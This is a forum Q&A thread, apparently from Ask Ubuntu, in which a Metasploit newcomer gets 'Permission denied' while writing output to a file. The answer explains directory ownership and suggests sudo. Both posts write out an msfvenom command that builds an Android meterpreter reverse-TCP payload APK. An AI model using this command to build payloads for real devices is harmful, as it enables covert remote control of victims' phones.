# Permission denied when using bundler commands

Tags: command-line, bash, permissions, metasploit

I am pretty much completely new to Metasploit so I may just be having a problem that anyone who is experienced could fix but I hadn't seen any fixes online anywhere.  I am running

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip R > filename.apk
```

and get returned

```
bash: filename.apk: Permission denied
```

Also to even run this command without getting piles of errors or to run the metasploit console I have to be in `/opt/metasploit-framework`.

Anyways, I have only found one source with the same problem, [Getting 'Permission Denied' when running bundler command](https://askubuntu.com/questions/709439/getting-permission-denied-when-running-bundler-command), however, there is no solution here either.

Has anyone else encountered this problem and found a solution?

Comment: How the question is related to Ubuntu?

Comment: I guess OP installed metasploit on Ubuntu.

Answer (score 2):

If you run

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip R > filename.apk
```

from a location you do not own creating the file `filename.apk` will result in a `Permission denied`. That is a well know security measure in Linux. In that case you need "sudo" in front of the command.

> Also to even run this command without getting piles of errors or to run the metasploit console I have to be in /opt/metasploit-framework/

Means you probably own that directory and anything in it or parameters that are expected can be found from `/opt/metasploit-framework/` and not from another directory (that will ne related to the PATH variable or setting the environment variables). ***Impossible to further answer unless you edit the messages into your question.***